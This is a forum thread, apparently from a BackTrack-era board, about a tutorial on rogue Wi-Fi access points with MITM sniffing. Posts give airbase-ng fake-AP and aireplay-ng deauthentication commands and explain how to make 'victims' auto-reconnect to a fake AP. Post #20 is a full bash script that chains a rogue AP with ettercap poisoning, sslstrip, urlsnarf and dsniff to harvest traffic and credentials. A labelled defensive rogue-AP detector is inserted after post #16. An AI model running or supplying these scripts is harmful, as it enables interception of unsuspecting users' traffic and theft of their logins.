Thread: Lucafa's tutorial: softAP with internet connection and MITM sniffing

  1. #11
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    You guys totally hijacked Lucifer's thread.

  2. #12
    Member
    Join Date
    Jan 2010
    Location
    Helsinki, Finland
    Posts
    235

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Quote: Originally Posted by marthafocker
    Nice tutorial. I'm not sure if it works yet; if it does, I think I'll put it into a shell script to speed up the process. How would you change the fake login page that the victim is forced to be directed to?
    Has anyone done that: how to create a fake login page and force victims to it?

  3. #13
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    5

    Cool Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    when using airbase I use this command to set up the AP

    Code:
    sudo airbase-ng -c 11 -a (Mac address of router) -e (access point name) -z 2 -W 1 -F capture mon0
    and this to deauth them

    Code:
    sudo aireplay-ng -0 10 -a (mac of router) -c (client accesspoint) mon0
    I am a complete newb at this and I put this together myself. Not sure what to do after it, as I'm using Ubuntu and am downloading BT4 for better results, but I had a successful connection from an auto-connect after using the first command to set up the AP and then deauth to force a reconnect to my AP. I have not got as far as trying to sniff yet.

  4. #14
    Member
    Join Date
    Mar 2010
    Location
    SO CAL
    Posts
    59

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Hey, best (HOW TO) yet; I gave it 5 stars. One question though: I was watching the creators of airdrop and I'm still kind of confused on how to write the rules. I'm pretty sure I'll get it once I use it, but a little advice never hurts.
    Stand up and be counted as a linux user.

  5. #15
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    - kherkhere; this tutorial is not for sniffing wireless encryption keys.

    - halfdone; search for g0tmi1k's bt4pre-final script, or maybe nick the greek's script. I do have to mention that both these scripts weren't working for me personally.

    - mikeyxb; get BT4Final instead of ubuntu. And if you're a 'complete newb' like you've said yourself, then start off with the very basics like in my tut, aka airbase-ng -e wifree mon0

    - enc0de; glad you like it. try airdrop-ng --help, and read through it carefully. I couldn't explain it any better.

    good luck guys
    Last edited by Lucifer; 04-09-2010 at 10:46 PM.

  6. #16
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    for those who've been messing with fake ap's, it's really important that you understand the following:

    this is an example:

    a client 'A1' is connected to his AP 'AA' with essid 'wireless' and WEP key '123456'
    if you now would deauth this client from his AP and setup a fake AP like:
    airbase-ng -e wireless -W 1 mon0
    then the client would reconnect to your fake AP since the correct essid and WEP flag are set, but the problem would be that the client is sending his packets encrypted with the key '123456' and airbase cannot decrypt them since you didn't specify a key. the windows/mac client (victim) associated because the essid and encryption match his real AP, BUUUT no communication between fake AP and client is possible since you didn't specify the key airbase should use to decrypt the packets. failure.

    having said this, in this example, you would need to start airbase this way:
    airbase-ng -e wireless -w 123456 mon0

    correct essid, correct WEP key the client is using + deauth the client with airdrop from his real AP => victim instantly connects to your fake ap, aka success

    you could of course, in this example, set airbase-ng -e wireless mon0 and wait for the victim to manually connect to your fake ap, but that can take ages. it's all about the windows/mac auto-reconnect function, which only cares about the essid and the encryption to reconnect, get it.

    I hope that makes some sense as this principle is fundamental for windows/mac victims.

    NOTE: this only applies to WEP clients, since it's not possible to set WPA encryption in airbase yet. for WPA clients, you can only set the correct essid in airbase and wait until the client manually connects to your fake ap, but again, this can take ages and requires clients that are stupid.
    Last edited by Lucifer; 04-09-2010 at 11:43 PM.
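
Added example, not part of any post in this thread: because the auto-reconnect behaviour described in post #16 keys only on ESSID and encryption type, a wireless monitoring sensor can flag beacons that reuse a known ESSID but contradict the site's AP inventory, and weight them higher when they follow a deauth burst. The `Frame` tuple, `INVENTORY`, the thresholds and the sample frames are constructed assumptions, not output of any real tool.

```python
from collections import namedtuple

Frame = namedtuple("Frame", "ts kind essid bssid channel privacy")  # one observed mgmt frame

# Assumed site inventory: ESSID -> {authorized BSSID: (channel, privacy)}.
INVENTORY = {"wireless": {"00:11:22:33:44:55": (6, "WPA2")}}
RANK = {"OPN": 0, "WEP": 1, "WPA": 2, "WPA2": 3}
DEAUTH_BURST, WINDOW = 5, 30  # frames, seconds (assumed thresholds)

def find_rogue_aps(frames, inventory=INVENTORY):
    """Return sorted (bssid, essid, reasons) for beacons that contradict inventory."""
    deauths, findings = {}, {}
    for f in sorted(frames, key=lambda fr: fr.ts):
        if f.kind == "deauth":  # remember when each BSSID was deauth-flooded
            deauths.setdefault(f.bssid, []).append(f.ts)
            continue
        known = inventory.get(f.essid)
        if known is None:
            continue  # not one of our ESSIDs
        reasons = set()
        if f.bssid not in known:
            reasons.add("unknown-bssid")
            expected = max(RANK[p] for _, p in known.values())
        else:  # BSSID matches, so check it is where the real AP lives
            chan, priv = known[f.bssid]
            expected = RANK[priv]
            if f.channel != chan:
                reasons.add("cloned-bssid-wrong-channel")
        if RANK[f.privacy] < expected:
            reasons.add("encryption-downgrade")
        if not reasons:
            continue
        for b in known:  # deauth burst against a real AP just before this beacon
            recent = [t for t in deauths.get(b, []) if 0 <= f.ts - t <= WINDOW]
            if len(recent) >= DEAUTH_BURST:
                reasons.add("follows-deauth-burst")
        findings.setdefault((f.bssid, f.essid), set()).update(reasons)
    return sorted((b, e, sorted(r)) for (b, e), r in findings.items())

SAMPLE = (  # constructed sample capture, not real traffic
    [Frame(t, "beacon", "wireless", "00:11:22:33:44:55", 6, "WPA2") for t in (0, 1)]
    + [Frame(10 + i, "deauth", "", "00:11:22:33:44:55", 6, "") for i in range(10)]
    + [Frame(25, "beacon", "wireless", "02:aa:bb:cc:dd:ee", 11, "WEP"),
       Frame(26, "beacon", "wireless", "00:11:22:33:44:55", 11, "WPA2"),
       Frame(27, "beacon", "cafe", "02:00:00:00:00:01", 1, "OPN")]
)

if __name__ == "__main__":
    print(find_rogue_aps(SAMPLE))
```

A beacon that copies ESSID, BSSID, channel and encryption exactly passes these checks, so the deauth-burst signal is worth alerting on by itself as well.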

  7. #17
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    5

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    right ok, I have sussed this one now, but is it possible to get the client to connect to my proxy for the internet connection? I use my adb android localhost proxy on port 8080, so I will be connecting the client to my fake ap with that proxy as the internet access. would everything be the same, or would it need some extra command lines somewhere in the conf file? and to use apt I have to do this command
    Code:
    export http_proxy=http://localhost:8080
    would I have to put that in place somewhere or not?

  8. #18
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Hi Lucifer!

    I have followed your tutorial and almost made it through.
    My issue is that when I'm done, clients can connect and get DHCP but not Internet...

    I have checked several times that my gateway (192.168.0.1) and interfaces (eth1 & wlan0/mon0) are correct.
    Internet on the host machine(bt4) is working.

    Do you have any clues?

  9. #19
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    mikeyxb; I'm afraid this goes beyond my knowledge as well, ask a bt guru

    ap/dc; what wireless card are you using?

    A: Make sure you've got what's NEEDED (look at the beginning of my tutorial)

    B: Try playing around with your wireless card's MTU values
    (ifconfig wlan0 mtu 1400, 1500 or 1800, and ifconfig mon0 mtu 1400, 1500, or 1800; mess around with some combinations)

    C: Maybe the MITM tools are causing you trouble. try again without them, do all the steps from 1 to 7, and leave this command out: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    D: If it still doesn't work and you happen to have got a second pc/laptop, repeat all tutorial's steps on this different machine to see if it helps. I've also got some problems with fake ap's on my laptop, it only works on my older pc.

    EDIT: also play around with the at0 MTU value.

    cheers,
    Last edited by Lucifer; 04-11-2010 at 07:56 PM.

  10. #20
    Just burned his ISO l3g10n's Avatar
    Join Date
    Feb 2010
    Posts
    13

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Wifi WMITM Attack - n3n4umxc - Pastebin.com

    Code:
    #!/bin/bash

    #----------------------------------------------------------------------#
    # This script is what I have taken from a script I found on the old BT
    # forums by Deathray. I modified it to fit my needs. -l3g10n
    #----------------------------------------------------------------------#
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    airmon-ng
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    kill `cat /var/run/dhcp3-server/dhcpd.pid`
    killall -9 dhcpd airbase-ng ettercap sslstrip driftnet urlsnarf
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    ifconfig $WIFACE up

    modprobe tun

    echo Airbase-ng is going to create our fake AP with the SSID we specified
    xterm -e airbase-ng -e "$ESSID" -P -C 30 -v mon0 &

    sleep 10

    echo Configuring interface created by airbase-ng
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

    echo 'Setting up iptables to handle traffic seen by the airbase-ng (at0) interface'
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE

    echo Creating a dhcpd.conf to assign addresses to clients that connect to us
    echo "default-lease-time 600;" > dhcpd.conf
    echo "max-lease-time 720;" >> dhcpd.conf
    echo "ddns-update-style none;" >> dhcpd.conf
    echo "authoritative;" >> dhcpd.conf
    echo "log-facility local7;" >> dhcpd.conf
    echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> dhcpd.conf
    echo "range 10.0.0.100 10.0.0.254;" >> dhcpd.conf
    echo "option routers 10.0.0.1;" >> dhcpd.conf
    echo "option domain-name-servers 8.8.8.8;" >> dhcpd.conf
    echo "}" >> dhcpd.conf

    echo 'DHCP server starting on our airbase-ng interface (at0)'
    dhcpd3 -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &
    xterm -e tail -f /var/log/messages &
    #echo 'Launching ettercap, poisoning all hosts on the at0 interface's subnet'
    xterm -e ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 // // &
    sleep 8

    echo 'Configuring ip forwarding'
    echo "1" > /proc/sys/net/ipv4/ip_forward

    echo 'Launching various tools'
    xterm -e sslstrip -a -k -f &
    driftnet -v -i at0 &
    xterm -e urlsnarf -i at0 &
    xterm -e dsniff -m -i at0 -d -w dsniff$(date +%F-%H%M).log &
    Last edited by l3g10n; 04-12-2010 at 12:38 AM.
